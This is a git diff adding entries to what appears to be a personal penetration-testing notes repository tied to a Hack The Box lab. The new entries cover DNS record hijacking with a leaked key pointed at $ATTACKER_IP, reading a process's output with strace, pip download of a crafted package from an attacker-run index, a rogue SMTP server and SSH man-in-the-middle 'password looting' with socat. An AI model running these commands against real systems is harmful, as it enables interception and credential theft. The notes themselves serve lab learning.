diff --git a/Enumeration/DNS.md b/Enumeration/DNS.md index 0ed7fde..2188e9d 100644 --- a/Enumeration/DNS.md +++ b/Enumeration/DNS.md @@ -23,3 +23,21 @@ send quit ``` * Check domain by querying the subdomain's A record via dig/drill/nslookup + +### Found Secrets for Keys + +If there is the possiblity of found secret for a key, for example in `/etc/bind/named.conf` then this secret can be used to join the domain. +```sh +nsupdate -d -y :: +Creating key... +namefromtext +keycreate + +server +update add mail.snoopy.htb. 86400 IN A $ATTACKER_IP +send +``` + +Copy the lines, every space counts as it has to be exactly like in the example + + diff --git a/Exploits/Binaries/Tips & Tricks.md b/Exploits/Binaries/Tips & Tricks.md index 88cfec4..efac799 100644 --- a/Exploits/Binaries/Tips & Tricks.md +++ b/Exploits/Binaries/Tips & Tricks.md @@ -1,6 +1,6 @@ # Tips & Tricks for Binary Exploitations -# Toggle ASLR +## Toggle ASLR State of ASLR can be switched via sysctl parameter `randomize_va_space`. [Kernel.org documentation](https://www.kernel.org/doc/html/latest/admin-guide/sysctl/kernel.html#randomize-va-space) displays the states of the switch. @@ -39,3 +39,10 @@ echo -e '\xde\xad\xc0\xde' | xxd ## NULL bytes in Adresses NULL bytes `\x00` in an address stop the execution of the payload input as a whole. An exception is `read()`, it does not stop on NULL bytes + +## Read from running process + +Read from a running process' stdout by attaching to the process via strace and read in the following way +```sh +strace -e read -p +``` diff --git a/Exploits/Python/Pip.md b/Exploits/Python/Pip.md new file mode 100644 index 0000000..697c47b --- /dev/null +++ b/Exploits/Python/Pip.md @@ -0,0 +1,12 @@ +# PIP Exploits + +## pip download + +Python pip executes tar files after the download option has been triggered. +Therefore, a hand crafted python module needs to be created and build. +After that pip can be used in the following way +```sh +pip download totally_not_malicious --index-url http://example.com --trusted-host example.com -v +``` + +An in detail blog post has been done by [wunderwuzzi on embracethered.com](https://embracethered.com/blog/posts/2022/python-package-manager-install-and-download-vulnerability/) diff --git a/Miscellaneous/SMTP.md b/Miscellaneous/SMTP.md index 5cf804f..49f640f 100644 --- a/Miscellaneous/SMTP.md +++ b/Miscellaneous/SMTP.md @@ -1,3 +1,10 @@ # SMTP * [hacktrick's site](https://book.hacktricks.xyz/pentesting/pentesting-smtp) + +## Adhoc SMTP Server + +Set up an SMTP Server quickly using `maildev` +```sh +sudo maildev -s 25 --ip $ATTACKER_IP +``` diff --git a/Post Exploitation/Man in the Middle.md b/Post Exploitation/Man in the Middle.md index c9de410..b1209ac 100644 --- a/Post Exploitation/Man in the Middle.md +++ b/Post Exploitation/Man in the Middle.md @@ -1,5 +1,8 @@ # Man In the Middle + +## Ettercap + * [Ettercap](https://www.ettercap-project.org/) * [Bettercap](https://www.bettercap.org/) @@ -19,6 +22,7 @@ if (ip.proto == TCP && tcp.dst == 80 && search(DATA.data, "filename.html") ) { msg("###### ETTERFILTER: substituted 'filename.html' with 'otherfilename.html' ######\n"); } ``` + * Escape double quote inside the payload string * compile via ```sh @@ -29,3 +33,16 @@ etterfilter filter.ef -o filter.ef ```sh ettercap -T -i -M arp -F filter.ef ``` + +## mitm-server + +Set up a local Man in the middle server which can be used for example for password looting if somebody logs in. +[SSH-MITM](https://docs.ssh-mitm.at/#) provides this feature. Therefore, download the package via `pip install ssh-mitm`. + +Redirect the port to the mitm server and start it afterwards + +```sh +((socat TCP4-LISTEN:2222 TCP4:10.10.14.4:10022 &) &) + +ssh-mitm server --remote-host $TARGET_IP +```